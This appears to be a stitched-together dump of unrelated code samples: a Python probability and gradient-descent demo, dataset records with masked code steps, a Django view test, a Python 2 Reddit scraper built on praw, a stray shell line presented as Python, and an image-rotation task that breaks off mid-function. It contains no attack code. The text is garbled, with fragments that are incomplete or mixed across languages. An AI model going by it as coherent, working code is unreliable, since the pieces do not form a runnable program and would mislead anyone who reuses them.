xs = [x/10.0 for x in range(-50, 50)]
plt.plot(xs, [ds_probability.normal_pdf(x, sigma=1) for x in xs], '-', label='mu=0-sigma=1')
plt.plot(xs, [ds_probability.normal_pdf(x, sigma=2) for x in xs], '--', label='mu=0-sigma=2')
plt.plot(xs, [ds_probability.normal_pdf(x, sigma=0.5) for x in xs], ':', label='mu=0-sigma=0.5')
plt.plot(xs, [ds_probability.normal_pdf(x, mu=-1) for x in xs], '-.', label='mu=-1-sigma=1')
plt.legend()
plt.title('Various Normals pdfs')
plt.show()
def normal_cdfs_visualization():
xs = [x/10.0 for x in range(-50, 50)]
plt.plot(xs, [ds_probability.normal_cdf(x, sigma=1) for x in xs], '-', label='mu=0-sigma=1')
plt.plot(xs, [ds_probability.normal_cdf(x, sigma=2) for x in xs], '--', label='mu=0-sigma=2')
plt.plot(xs, [ds_probability.normal_cdf(x, sigma=0.5) for x in xs], ':', label='mu=0-sigma=0.5')
plt.plot(xs, [ds_probability.normal_cdf(x, mu=-1) for x in xs], '-.', label='mu=-1-sigma=1')
plt.legend()
plt.title('Various Normals cdfs')
plt.show()
def random_kid():
return rnd.choice(['boy', 'girl'])
def girl_probability():
both_g = 0
older_g = 0
either_g = 0
for _ in range(10000):
younger = random_kid()
older = random_kid()
if older == 'girl':
older_g += 1
if older == 'girl' and younger == 'girl':
both_g += 1
if older == 'girl' or younger == 'girl':
either_g += 1
print("P(both/older): ", both_g/older_g)
print("P(both/either): ", both_g/either_g)
def compare_binomial_dist_to_normal_approx(p, n, nb_points):
data = [ds_probability.binomial(n, p) for _ in range(nb_points)]
#showing actual binomial samples on bar chart
histogram = Counter(data)
plt.bar([x - 0.4 for x in histogram.keys()],
[v / nb_points for v in histogram.values()],
0.8, color='0.7')
mu_px = p * n
sigma_px = math.sqrt(n*p*(1 - p))
#line chart that shows the normal approximation of the binomial variable
xs = range(min(data), max(data)+1)
ys = [ds_probability.normal_cdf(i+0.5, mu_px, sigma_px) - ds_probability.normal_cdf(i-0.5, mu_px, sigma_px) for i in xs]
plt.plot(xs, ys)
plt.title('Binomial Dist vs Normal approximation')
plt.show()
if __name__ == '__main__':
# print('5/2: ' + str(5/2))
# print('5//2: ' + str(5//2))
# A=[[1,2,3], [1,1,1], [2,2,3]]
# print(ds_algebra.get_col(A,1))
# girl_probability()
#normal_cdfs_visualization()
# print(ds_probability.inverse_normal_cdf(0.98))
# compare_binomial_dist_to_normal_approx(0.75, 100, 100000)
#Gradient Descent example
#random starting point
v = [rnd.randint(-100, 100) for _ in range(3)]
tolerance = 0.000001
while True:
gradient = ds_gradient_descent.square_gradient(v)
next_v = ds_gradient_descent.step(v, gradient, -0.01)
if ds_algebra.distance(next_v, v) < tolerance:
print('final resting point: ', v)
break
v = next_v
|
normal
|
{
"blob_id": "c0adc0032a2647a19d3540c057fa9762906e5f62",
"index": 4439,
"step-1": "<mask token>\n\n\ndef normal_pdfs_visualization():\n xs = [(x / 10.0) for x in range(-50, 50)]\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=1) for x in xs], '-',\n label='mu=0-sigma=1')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=2) for x in xs], '--',\n label='mu=0-sigma=2')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=0.5) for x in xs], ':',\n label='mu=0-sigma=0.5')\n plt.plot(xs, [ds_probability.normal_pdf(x, mu=-1) for x in xs], '-.',\n label='mu=-1-sigma=1')\n plt.legend()\n plt.title('Various Normals pdfs')\n plt.show()\n\n\n<mask token>\n\n\ndef random_kid():\n return rnd.choice(['boy', 'girl'])\n\n\ndef girl_probability():\n both_g = 0\n older_g = 0\n either_g = 0\n for _ in range(10000):\n younger = random_kid()\n older = random_kid()\n if older == 'girl':\n older_g += 1\n if older == 'girl' and younger == 'girl':\n both_g += 1\n if older == 'girl' or younger == 'girl':\n either_g += 1\n print('P(both/older): ', both_g / older_g)\n print('P(both/either): ', both_g / either_g)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef normal_pdfs_visualization():\n xs = [(x / 10.0) for x in range(-50, 50)]\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=1) for x in xs], '-',\n label='mu=0-sigma=1')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=2) for x in xs], '--',\n label='mu=0-sigma=2')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=0.5) for x in xs], ':',\n label='mu=0-sigma=0.5')\n plt.plot(xs, [ds_probability.normal_pdf(x, mu=-1) for x in xs], '-.',\n label='mu=-1-sigma=1')\n plt.legend()\n plt.title('Various Normals pdfs')\n plt.show()\n\n\n<mask token>\n\n\ndef random_kid():\n return rnd.choice(['boy', 'girl'])\n\n\ndef girl_probability():\n both_g = 0\n older_g = 0\n either_g = 0\n for _ in range(10000):\n younger = random_kid()\n older = random_kid()\n if older == 'girl':\n older_g += 1\n if older == 'girl' and younger == 'girl':\n both_g += 1\n if older == 'girl' or younger == 'girl':\n either_g += 1\n print('P(both/older): ', both_g / older_g)\n print('P(both/either): ', both_g / either_g)\n\n\ndef compare_binomial_dist_to_normal_approx(p, n, nb_points):\n data = [ds_probability.binomial(n, p) for _ in range(nb_points)]\n histogram = Counter(data)\n plt.bar([(x - 0.4) for x in histogram.keys()], [(v / nb_points) for v in\n histogram.values()], 0.8, color='0.7')\n mu_px = p * n\n sigma_px = math.sqrt(n * p * (1 - p))\n xs = range(min(data), max(data) + 1)\n ys = [(ds_probability.normal_cdf(i + 0.5, mu_px, sigma_px) -\n ds_probability.normal_cdf(i - 0.5, mu_px, sigma_px)) for i in xs]\n plt.plot(xs, ys)\n plt.title('Binomial Dist vs Normal approximation')\n plt.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef normal_pdfs_visualization():\n xs = [(x / 10.0) for x in range(-50, 50)]\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=1) for x in xs], '-',\n label='mu=0-sigma=1')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=2) for x in xs], '--',\n label='mu=0-sigma=2')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=0.5) for x in xs], ':',\n label='mu=0-sigma=0.5')\n plt.plot(xs, [ds_probability.normal_pdf(x, mu=-1) for x in xs], '-.',\n label='mu=-1-sigma=1')\n plt.legend()\n plt.title('Various Normals pdfs')\n plt.show()\n\n\ndef normal_cdfs_visualization():\n xs = [(x / 10.0) for x in range(-50, 50)]\n plt.plot(xs, [ds_probability.normal_cdf(x, sigma=1) for x in xs], '-',\n label='mu=0-sigma=1')\n plt.plot(xs, [ds_probability.normal_cdf(x, sigma=2) for x in xs], '--',\n label='mu=0-sigma=2')\n plt.plot(xs, [ds_probability.normal_cdf(x, sigma=0.5) for x in xs], ':',\n label='mu=0-sigma=0.5')\n plt.plot(xs, [ds_probability.normal_cdf(x, mu=-1) for x in xs], '-.',\n label='mu=-1-sigma=1')\n plt.legend()\n plt.title('Various Normals cdfs')\n plt.show()\n\n\ndef random_kid():\n return rnd.choice(['boy', 'girl'])\n\n\ndef girl_probability():\n both_g = 0\n older_g = 0\n either_g = 0\n for _ in range(10000):\n younger = random_kid()\n older = random_kid()\n if older == 'girl':\n older_g += 1\n if older == 'girl' and younger == 'girl':\n both_g += 1\n if older == 'girl' or younger == 'girl':\n either_g += 1\n print('P(both/older): ', both_g / older_g)\n print('P(both/either): ', both_g / either_g)\n\n\ndef compare_binomial_dist_to_normal_approx(p, n, nb_points):\n data = [ds_probability.binomial(n, p) for _ in range(nb_points)]\n histogram = Counter(data)\n plt.bar([(x - 0.4) for x in histogram.keys()], [(v / nb_points) for v in\n histogram.values()], 0.8, color='0.7')\n mu_px = p * n\n sigma_px = math.sqrt(n * p * (1 - p))\n xs = range(min(data), max(data) + 1)\n ys = [(ds_probability.normal_cdf(i + 0.5, mu_px, sigma_px) -\n ds_probability.normal_cdf(i - 0.5, mu_px, sigma_px)) for i in xs]\n plt.plot(xs, ys)\n plt.title('Binomial Dist vs Normal approximation')\n plt.show()\n\n\nif __name__ == '__main__':\n v = [rnd.randint(-100, 100) for _ in range(3)]\n tolerance = 1e-06\n while True:\n gradient = ds_gradient_descent.square_gradient(v)\n next_v = ds_gradient_descent.step(v, gradient, -0.01)\n if ds_algebra.distance(next_v, v) < tolerance:\n print('final resting point: ', v)\n break\n v = next_v\n",
"step-4": "from __future__ import division\nimport random as rnd\nimport math\nfrom collections import Counter\nfrom matplotlib import pyplot as plt\nimport ds_library\nimport ds_algebra\nimport ds_probability\nimport ds_gradient_descent\n\n\ndef normal_pdfs_visualization():\n xs = [(x / 10.0) for x in range(-50, 50)]\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=1) for x in xs], '-',\n label='mu=0-sigma=1')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=2) for x in xs], '--',\n label='mu=0-sigma=2')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=0.5) for x in xs], ':',\n label='mu=0-sigma=0.5')\n plt.plot(xs, [ds_probability.normal_pdf(x, mu=-1) for x in xs], '-.',\n label='mu=-1-sigma=1')\n plt.legend()\n plt.title('Various Normals pdfs')\n plt.show()\n\n\ndef normal_cdfs_visualization():\n xs = [(x / 10.0) for x in range(-50, 50)]\n plt.plot(xs, [ds_probability.normal_cdf(x, sigma=1) for x in xs], '-',\n label='mu=0-sigma=1')\n plt.plot(xs, [ds_probability.normal_cdf(x, sigma=2) for x in xs], '--',\n label='mu=0-sigma=2')\n plt.plot(xs, [ds_probability.normal_cdf(x, sigma=0.5) for x in xs], ':',\n label='mu=0-sigma=0.5')\n plt.plot(xs, [ds_probability.normal_cdf(x, mu=-1) for x in xs], '-.',\n label='mu=-1-sigma=1')\n plt.legend()\n plt.title('Various Normals cdfs')\n plt.show()\n\n\ndef random_kid():\n return rnd.choice(['boy', 'girl'])\n\n\ndef girl_probability():\n both_g = 0\n older_g = 0\n either_g = 0\n for _ in range(10000):\n younger = random_kid()\n older = random_kid()\n if older == 'girl':\n older_g += 1\n if older == 'girl' and younger == 'girl':\n both_g += 1\n if older == 'girl' or younger == 'girl':\n either_g += 1\n print('P(both/older): ', both_g / older_g)\n print('P(both/either): ', both_g / either_g)\n\n\ndef compare_binomial_dist_to_normal_approx(p, n, nb_points):\n data = [ds_probability.binomial(n, p) for _ in range(nb_points)]\n histogram = Counter(data)\n plt.bar([(x - 0.4) for x in histogram.keys()], [(v / nb_points) for v in\n histogram.values()], 0.8, color='0.7')\n mu_px = p * n\n sigma_px = math.sqrt(n * p * (1 - p))\n xs = range(min(data), max(data) + 1)\n ys = [(ds_probability.normal_cdf(i + 0.5, mu_px, sigma_px) -\n ds_probability.normal_cdf(i - 0.5, mu_px, sigma_px)) for i in xs]\n plt.plot(xs, ys)\n plt.title('Binomial Dist vs Normal approximation')\n plt.show()\n\n\nif __name__ == '__main__':\n v = [rnd.randint(-100, 100) for _ in range(3)]\n tolerance = 1e-06\n while True:\n gradient = ds_gradient_descent.square_gradient(v)\n next_v = ds_gradient_descent.step(v, gradient, -0.01)\n if ds_algebra.distance(next_v, v) < tolerance:\n print('final resting point: ', v)\n break\n v = next_v\n",
"step-5": "from __future__ import division\r\nimport random as rnd\r\nimport math\r\nfrom collections import Counter\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\nimport ds_library\r\nimport ds_algebra\r\nimport ds_probability\r\nimport ds_gradient_descent\r\n\r\ndef normal_pdfs_visualization():\r\n\txs = [x/10.0 for x in range(-50, 50)]\r\n\tplt.plot(xs, [ds_probability.normal_pdf(x, sigma=1) for x in xs], '-', label='mu=0-sigma=1')\r\n\tplt.plot(xs, [ds_probability.normal_pdf(x, sigma=2) for x in xs], '--', label='mu=0-sigma=2')\r\n\tplt.plot(xs, [ds_probability.normal_pdf(x, sigma=0.5) for x in xs], ':', label='mu=0-sigma=0.5')\r\n\tplt.plot(xs, [ds_probability.normal_pdf(x, mu=-1) for x in xs], '-.', label='mu=-1-sigma=1')\r\n\tplt.legend()\r\n\tplt.title('Various Normals pdfs')\r\n\tplt.show()\r\n\t\r\ndef normal_cdfs_visualization():\r\n\txs = [x/10.0 for x in range(-50, 50)]\r\n\tplt.plot(xs, [ds_probability.normal_cdf(x, sigma=1) for x in xs], '-', label='mu=0-sigma=1')\r\n\tplt.plot(xs, [ds_probability.normal_cdf(x, sigma=2) for x in xs], '--', label='mu=0-sigma=2')\r\n\tplt.plot(xs, [ds_probability.normal_cdf(x, sigma=0.5) for x in xs], ':', label='mu=0-sigma=0.5')\r\n\tplt.plot(xs, [ds_probability.normal_cdf(x, mu=-1) for x in xs], '-.', label='mu=-1-sigma=1')\r\n\tplt.legend()\r\n\tplt.title('Various Normals cdfs')\r\n\tplt.show()\r\n\r\n\r\n\r\ndef random_kid():\r\n return rnd.choice(['boy', 'girl'])\r\ndef girl_probability():\r\n\tboth_g = 0\r\n\tolder_g = 0\r\n\teither_g = 0\r\n\r\n\tfor _ in range(10000):\r\n\t\tyounger = random_kid()\r\n\t\tolder = random_kid()\r\n\r\n\t\tif older == 'girl':\r\n\t\t\tolder_g += 1\r\n\t\tif older == 'girl' and younger == 'girl':\r\n\t\t\tboth_g += 1\r\n\t\tif older == 'girl' or younger == 'girl':\r\n\t\t\teither_g += 1\r\n\tprint(\"P(both/older): \", both_g/older_g)\r\n\tprint(\"P(both/either): \", both_g/either_g)\r\n\r\ndef compare_binomial_dist_to_normal_approx(p, n, nb_points):\r\n\tdata = [ds_probability.binomial(n, p) for _ in range(nb_points)]\r\n\t#showing actual binomial samples on bar chart\r\n\thistogram = Counter(data)\r\n\tplt.bar([x - 0.4 for x in histogram.keys()],\r\n\t\t\t[v / nb_points for v in histogram.values()],\r\n\t\t\t0.8, color='0.7')\r\n\r\n\tmu_px = p * n\r\n\tsigma_px = math.sqrt(n*p*(1 - p))\r\n\r\n\t#line chart that shows the normal approximation of the binomial variable\r\n\txs = range(min(data), max(data)+1)\r\n\tys = [ds_probability.normal_cdf(i+0.5, mu_px, sigma_px) - ds_probability.normal_cdf(i-0.5, mu_px, sigma_px) for i in xs]\r\n\r\n\tplt.plot(xs, ys)\r\n\tplt.title('Binomial Dist vs Normal approximation')\r\n\tplt.show()\r\n\r\nif __name__ == '__main__':\r\n\t# print('5/2: ' + str(5/2))\r\n\t# print('5//2: ' + str(5//2))\r\n\r\n\t# A=[[1,2,3], [1,1,1], [2,2,3]]\r\n\t# print(ds_algebra.get_col(A,1))\r\n\r\n\t# girl_probability()\r\n\r\n\t#normal_cdfs_visualization()\r\n\r\n\t# print(ds_probability.inverse_normal_cdf(0.98))\r\n\r\n\t# compare_binomial_dist_to_normal_approx(0.75, 100, 100000)\r\n\r\n\t#Gradient Descent example\r\n\t#random starting point \r\n\tv = [rnd.randint(-100, 100) for _ in range(3)]\r\n\ttolerance = 0.000001\r\n\r\n\twhile True:\r\n\t\tgradient = ds_gradient_descent.square_gradient(v)\r\n\t\tnext_v = ds_gradient_descent.step(v, gradient, -0.01)\r\n\t\tif ds_algebra.distance(next_v, v) < tolerance:\r\n\t\t\tprint('final resting point: ', v)\r\n\t\t\tbreak\r\n\r\n\t\tv = next_v\r\n",
"step-ids": [
3,
4,
6,
7,
8
]
}
|
[
3,
4,
6,
7,
8
] |
from django.shortcuts import resolve_url as r
from django.test import TestCase
class coreGetHome(TestCase):
def setUp(self):
self.resp = self.client.get(r('core:core_home'))
def test_template_home(self):
self.assertTemplateUsed(self.resp, 'index.html')
def test_200_template_home(self):
self.assertEqual(200, self.resp.status_code)
|
normal
|
{
"blob_id": "d20e41dd7054ff133be264bebf13e4e218710ae5",
"index": 933,
"step-1": "<mask token>\n\n\nclass coreGetHome(TestCase):\n <mask token>\n <mask token>\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-2": "<mask token>\n\n\nclass coreGetHome(TestCase):\n\n def setUp(self):\n self.resp = self.client.get(r('core:core_home'))\n <mask token>\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-3": "<mask token>\n\n\nclass coreGetHome(TestCase):\n\n def setUp(self):\n self.resp = self.client.get(r('core:core_home'))\n\n def test_template_home(self):\n self.assertTemplateUsed(self.resp, 'index.html')\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-4": "from django.shortcuts import resolve_url as r\nfrom django.test import TestCase\n\n\nclass coreGetHome(TestCase):\n\n def setUp(self):\n self.resp = self.client.get(r('core:core_home'))\n\n def test_template_home(self):\n self.assertTemplateUsed(self.resp, 'index.html')\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
import praw
import pickle
import copy
class histogram:
def __init__(self, dictionary=None):
self.frequencies = {}
if dictionary is not None:
self.frequencies = copy.deepcopy(dictionary)
def get_sum(self):
the_sum = 0
for e in self.frequencies:
the_sum += self.frequencies[e]
return the_sum
def add_frequency(self, key, value):
if key in self.frequencies:
self.frequencies[key] += value
else:
self.frequencies[key] = value
def add_by_frequencies(self,frequencies):
for key in frequencies.frequencies:
self.add_frequency(key, frequencies.frequencies[key])
def multiply_frequency(self, key, value):
if key in self.frequencies:
self.frequencies[key] *= value
else:
self.frequencies[key] = 0.0
def multiply_by_frequencies(self, frequencies):
for key in frequencies.frequencies:
self.multiply_frequency(key, frequencies.frequencies[key])
def multiply_by_scalar(self, scalar):
for key in self.frequencies:
self.multiply_frequency(key,scalar)
def divide_frequency(self, key, value):
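        # Convention: a zero numerator maps to 1.0, a nonzero value divided by zero gives inf,
        # and a missing key becomes 0.0 (or 1.0 when value <= 0).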
if key in self.frequencies:
if value != 0:
if self.frequencies[key] == 0:
self.frequencies[key] = 1.0
else:
self.frequencies[key] /= (0.0 + value)
else:
if self.frequencies[key] == 0:
self.frequencies[key] = 1.0
else:
self.frequencies[key] = float('inf')
else:
if value > 0:
self.frequencies[key] = 0.0
else:
self.frequencies[key] = 1.0
def divide_by_frequencies(self, frequencies):
for key in frequencies.frequencies:
self.divide_frequency(key, frequencies.frequencies[key])
class comment:
def __init__(self, comment):
if comment is not None and hasattr(comment,'author') and comment.author is not None and hasattr(comment.author, 'name'):
self.author_name = comment.author.name
else:
self.author_name = ''
self.subreddit = str(comment.subreddit.display_name.strip(' ').lower())
class user:
@staticmethod
def get_histogram(comments, author_name):
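        # Normalized histogram: fraction of this author's comments that fall in each subreddit (sums to 1).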
total_comments_by_author = 0
the_histogram = histogram()
for comment in comments:
if comment.author_name == author_name:
total_comments_by_author += 1
the_histogram.add_frequency(comment.subreddit, 1)
the_histogram.multiply_by_scalar(1.0 / total_comments_by_author)
#print author_name, " ", the_histogram.get_sum()
return the_histogram.frequencies
class community:
@staticmethod
def get_histogram(comments, subreddit_name):
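        # Normalized histogram: fraction of this subreddit's comments written by each author (sums to 1).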
total_comments_in_subreddit = 0
the_histogram = histogram()
for comment in comments:
if comment.subreddit == subreddit_name:
total_comments_in_subreddit += 1
the_histogram.add_frequency(comment.author_name, 1)
the_histogram.multiply_by_scalar(1.0 / total_comments_in_subreddit)
return the_histogram.frequencies
class data:
def __init__(self, comments, x_subs):
self.comments = comments
self.x_subs = x_subs
def remove_sub_data(subredditName):
the_data = pickle.load(open('data.pkl', 'rb'))
comments = the_data.comments
x_subs = the_data.x_subs
comments = [x for x in comments if x.subreddit.lower() != subredditName]
x_subs = [x for x in x_subs if x != subredditName]
the_data = data(comments, x_subs )
print x_subs
output = open('data.pkl', 'wb')
pickle.dump(the_data,output)
output.close()
def add_sub_data(subredditName, num_redditors):
user_agent = ("Testing Reddit Functionality by /u/Reddit_Projector https://github.com/joshlemer/RedditProject")
reddit = praw.Reddit(user_agent)
subreddit_object = reddit.get_subreddit(subredditName)
the_data = pickle.load(open('data.pkl', 'rb'))
comments = the_data.comments
x_subs = the_data.x_subs
y_comments = [comment(a) for a in subreddit_object.get_comments(limit=num_redditors)]
z_comments = []
redditors = []
i = 0
for y_com in y_comments:
print y_com.subreddit, " z = ", i
redditor = y_com.author_name
if redditor not in redditors:
try:
z_comments += [comment(a) for a in reddit.get_redditor(y_com.author_name).get_comments(limit=100)]
redditors.append(redditor)
except:
print "oops, that user is weird"
i += 1
comments += list(z_comments)
print "COMMENTS LENGTH: ", len(comments)
the_data = data(comments, x_subs + [subredditName] )
output = open('data.pkl', 'wb')
pickle.dump(the_data,output)
output.close()
if __name__ == "__main__":
user_agent = ("Testing Reddit Functionality by /u/Reddit_Projector https://github.com/joshlemer/RedditProject")
reddit = praw.Reddit(user_agent)
subredditName = 'all'
subreddit_object = reddit.get_subreddit(subredditName)
y = 5 #Comments per subreddit inspected
z = 100 #Comments per user inspected
#List of subreddits to be analyzed
# x_subs = [
# 'hiphopheads',
# 'metal',
# 'postrock',
# 'letstalkmusic' ]
#Commented code below is for pulling our x_subs from the most recent comments in /r/all
# x_comments = [comment(a) for a in subreddit_object.get_comments(limit=x)]
# i = 0
# for c in x_comments:
# print "x = ", i
# if c.subreddit not in x_subs:
# x_subs.append(c.subreddit)
# i += 1
#List of subreddits to be analyzed
x_subs = [
'hiphopheads',
'metal',
'postrock',
'letstalkmusic' ]
y_comments = []
i = 0
print "Getting ", y, " comments from each of the ", len(x_subs), " subreddits"
for x_sub in x_subs:
print "\tRetrieving ", 5, " comments from /r/", x_sub
subreddit_object = reddit.get_subreddit(x_sub)
y_comments += [comment(a) for a in subreddit_object.get_comments(limit=y)]
i += 1
z_comments = []
redditors = []
i = 0
print "Following commenters from original subs to gather their other reddit activity"
for y_com in y_comments:
redditor = y_com.author_name
print "\tAnalyzing user ", redditor, " (user ", i, "/", len(y_comments), ")"
if redditor not in redditors:
try:
z_comments += [comment(a) for a in reddit.get_redditor(y_com.author_name).get_comments(limit=z)]
redditors.append(redditor)
except:
print "\t\toops, that user is weird\n\t\tprobably deleted their comment or profile or something"
else:
print "\t\tAlready looked at this user, no need to make an other call."
i += 1
comments = list(z_comments)
print "COMMENTS LENGTH: ", len(comments)
the_data = data(comments, x_subs)
output = open('data.pkl', 'wb')
pickle.dump(the_data,output)
output.close()
|
normal
|
{
"blob_id": "f135d52e4d5e49f96869c4209b84f30ff72f6780",
"index": 876,
"step-1": "import praw\nimport pickle\nimport copy\n\nclass histogram:\n def __init__(self, dictionary=None):\n self.frequencies = {}\n if dictionary is not None:\n self.frequencies = copy.deepcopy(dictionary)\n\n def get_sum(self):\n the_sum = 0\n for e in self.frequencies:\n the_sum += self.frequencies[e]\n return the_sum\n\n def add_frequency(self, key, value):\n if key in self.frequencies:\n self.frequencies[key] += value\n else:\n self.frequencies[key] = value\n\n def add_by_frequencies(self,frequencies):\n for key in frequencies.frequencies:\n self.add_frequency(key, frequencies.frequencies[key])\n\n def multiply_frequency(self, key, value):\n if key in self.frequencies:\n self.frequencies[key] *= value\n else:\n self.frequencies[key] = 0.0\n\n def multiply_by_frequencies(self, frequencies):\n for key in frequencies.frequencies:\n self.multiply_frequency(key, frequencies.frequencies[key])\n\n def multiply_by_scalar(self, scalar):\n for key in self.frequencies:\n self.multiply_frequency(key,scalar)\n\n def divide_frequency(self, key, value):\n if key in self.frequencies:\n if value != 0:\n if self.frequencies[key] == 0:\n self.frequencies[key] = 1.0\n else:\n self.frequencies[key] /= (0.0 + value)\n else:\n if self.frequencies[key] == 0:\n self.frequencies[key] = 1.0\n else:\n self.frequencies[key] = float('inf')\n else:\n if value > 0:\n self.frequencies[key] = 0.0\n else:\n self.frequencies[key] = 1.0\n\n def divide_by_frequencies(self, frequencies):\n for key in frequencies.frequencies:\n self.divide_frequency(key, frequencies.frequencies[key])\n\n\nclass comment:\n def __init__(self, comment):\n if comment is not None and hasattr(comment,'author') and comment.author is not None and hasattr(comment.author, 'name'):\n self.author_name = comment.author.name\n else:\n self.author_name = ''\n\n self.subreddit = str(comment.subreddit.display_name.strip(' ').lower())\n\nclass user:\n @staticmethod\n def get_histogram(comments, author_name):\n total_comments_by_author = 0\n the_histogram = histogram()\n for comment in comments:\n if comment.author_name == author_name:\n total_comments_by_author += 1\n the_histogram.add_frequency(comment.subreddit, 1)\n the_histogram.multiply_by_scalar(1.0 / total_comments_by_author)\n #print author_name, \" \", the_histogram.get_sum()\n return the_histogram.frequencies\n\nclass community:\n @staticmethod\n def get_histogram(comments, subreddit_name):\n total_comments_in_subreddit = 0\n the_histogram = histogram()\n for comment in comments:\n if comment.subreddit == subreddit_name:\n total_comments_in_subreddit += 1\n the_histogram.add_frequency(comment.author_name, 1)\n the_histogram.multiply_by_scalar(1.0 / total_comments_in_subreddit)\n return the_histogram.frequencies\n\nclass data:\n def __init__(self, comments, x_subs):\n self.comments = comments\n self.x_subs = x_subs\n\n\ndef remove_sub_data(subredditName):\n the_data = pickle.load(open('data.pkl', 'rb'))\n comments = the_data.comments\n x_subs = the_data.x_subs\n\n comments = [x for x in comments if x.subreddit.lower() != subredditName]\n x_subs = [x for x in x_subs if x != subredditName]\n\n the_data = data(comments, x_subs )\n print x_subs\n output = open('data.pkl', 'wb')\n pickle.dump(the_data,output)\n output.close()\n\n\n\n\ndef add_sub_data(subredditName, num_redditors):\n user_agent = (\"Testing Reddit Functionality by /u/Reddit_Projector https://github.com/joshlemer/RedditProject\")\n reddit = praw.Reddit(user_agent)\n subreddit_object = reddit.get_subreddit(subredditName)\n\n the_data = 
pickle.load(open('data.pkl', 'rb'))\n comments = the_data.comments\n x_subs = the_data.x_subs\n y_comments = [comment(a) for a in subreddit_object.get_comments(limit=num_redditors)]\n\n z_comments = []\n redditors = []\n i = 0\n for y_com in y_comments:\n print y_com.subreddit, \" z = \", i\n redditor = y_com.author_name\n if redditor not in redditors:\n try:\n z_comments += [comment(a) for a in reddit.get_redditor(y_com.author_name).get_comments(limit=100)]\n redditors.append(redditor)\n except:\n print \"oops, that user is weird\"\n i += 1\n\n comments += list(z_comments)\n print \"COMMENTS LENGTH: \", len(comments)\n the_data = data(comments, x_subs + [subredditName] )\n output = open('data.pkl', 'wb')\n pickle.dump(the_data,output)\n output.close()\n\n\n\nif __name__ == \"__main__\":\n user_agent = (\"Testing Reddit Functionality by /u/Reddit_Projector https://github.com/joshlemer/RedditProject\")\n reddit = praw.Reddit(user_agent)\n subredditName = 'all'\n subreddit_object = reddit.get_subreddit(subredditName)\n y = 5 #Comments per subreddit inspected\n z = 100 #Comments per user inspected\n\n\n\n #List of subreddits to be analyzed\n # x_subs = [\n # 'hiphopheads',\n # 'metal',\n # 'postrock',\n # 'letstalkmusic' ]\n\n #Commented code below is for pulling our x_subs from the most recent comments in /r/all\n\n # x_comments = [comment(a) for a in subreddit_object.get_comments(limit=x)]\n # i = 0\n # for c in x_comments:\n # print \"x = \", i\n # if c.subreddit not in x_subs:\n # x_subs.append(c.subreddit)\n # i += 1\n\n #List of subreddits to be analyzed\n x_subs = [\n 'hiphopheads',\n 'metal',\n 'postrock',\n 'letstalkmusic' ]\n\n y_comments = []\n i = 0\n print \"Getting \", y, \" comments from each of the \", len(x_subs), \" subreddits\"\n for x_sub in x_subs:\n print \"\\tRetrieving \", 5, \" comments from /r/\", x_sub\n subreddit_object = reddit.get_subreddit(x_sub)\n y_comments += [comment(a) for a in subreddit_object.get_comments(limit=y)]\n i += 1\n\n z_comments = []\n redditors = []\n i = 0\n print \"Following commenters from original subs to gather their other reddit activity\"\n for y_com in y_comments:\n redditor = y_com.author_name\n print \"\\tAnalyzing user \", redditor, \" (user \", i, \"/\", len(y_comments), \")\"\n if redditor not in redditors:\n try:\n z_comments += [comment(a) for a in reddit.get_redditor(y_com.author_name).get_comments(limit=z)]\n redditors.append(redditor)\n except:\n print \"\\t\\toops, that user is weird\\n\\t\\tprobably deleted their comment or profile or something\"\n else:\n print \"\\t\\tAlready looked at this user, no need to make an other call.\"\n i += 1\n\n comments = list(z_comments)\n print \"COMMENTS LENGTH: \", len(comments)\n the_data = data(comments, x_subs)\n output = open('data.pkl', 'wb')\n pickle.dump(the_data,output)\n output.close()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Error using ncdump - NetCDF4 Python
ncdump -h filename
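# Note: ncdump is a command-line utility from the netCDF C tools, not Python syntax;
# run it in a shell, or from Python via e.g. subprocess.run(['ncdump', '-h', 'filename']).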
|
normal
|
{
"blob_id": "12f0eeeb81fe611d88e33fd2e8df407e289fb582",
"index": 1255,
"step-1": "# Error using ncdump - NetCDF4 Python\nncdump -h filename\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
try:
import Image
except ImportError:
from PIL import Image
import sys
sys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir, 'DropPy.Common')))
from file_tools import get_file_paths_from_directory
class Task(object):
"""
Documentation: https://docs.droppyapp.com/tasks/image-rotate
"""
def __init__(self, input_dir, output_dir, **kwargs):
# Get keyword arguments.
degrees = kwargs.get(str('degrees'), 90.0)
expand_arg = kwargs.get(str('expand'), True)
# Check arguments.
if expand_arg is True:
expand = 1
elif expand_arg is False:
expand = 0
else:
sys.exit('Argument expand invalid')
# Process files and directories.
for item_name in os.listdir(input_dir):
item_path = os.path.join(input_dir, item_name)
if os.path.isfile(item_path):
self.rotate_file(item_path, output_dir, degrees, expand)
elif os.path.isdir(item_path):
output_sub_dir = os.path.join(output_dir, item_name)
os.makedirs(output_sub_dir)
contained_files = get_file_paths_from_directory(item_path)
for contained_file in contained_files:
self.rotate_file(contained_file, output_sub_dir, degrees, expand)
@staticmethod
def rotate_file(input_file, output_dir, degrees, expand):
output_file_name = os.path.basename(input_file)
output_file = os.path.join(output_dir, output_file_name)
